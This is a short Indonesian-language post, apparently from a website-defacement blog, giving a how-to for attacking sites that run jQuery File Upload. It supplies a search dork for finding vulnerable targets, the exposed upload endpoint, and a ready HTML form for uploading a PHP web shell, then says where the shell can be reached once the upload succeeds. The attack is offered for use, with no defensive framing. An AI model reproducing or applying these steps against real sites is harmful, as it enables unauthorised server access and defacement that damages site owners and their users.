Deface dengan tehnik jQuery File Upload



Langsung aja ane kasih tau cara deface dengan tehnik jQuery File Upload CSRF

Dork : inurl:/jquery-file-upload/
Exploit : http://localhost/dir/jquery-file-upload/server/php/

Exploit CSRF nya :

<form method="POST" action="http://localhost/dir/jquery-file-upload/server/php/"enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button></form>

Contoh target vuln :


Udah tau kan cara make nya , kalo sukses Shell akses nya di: http://localhost/dir/jquery-file-upload/server/php/files/Shell.php

Greatz :


EmoticonEmoticon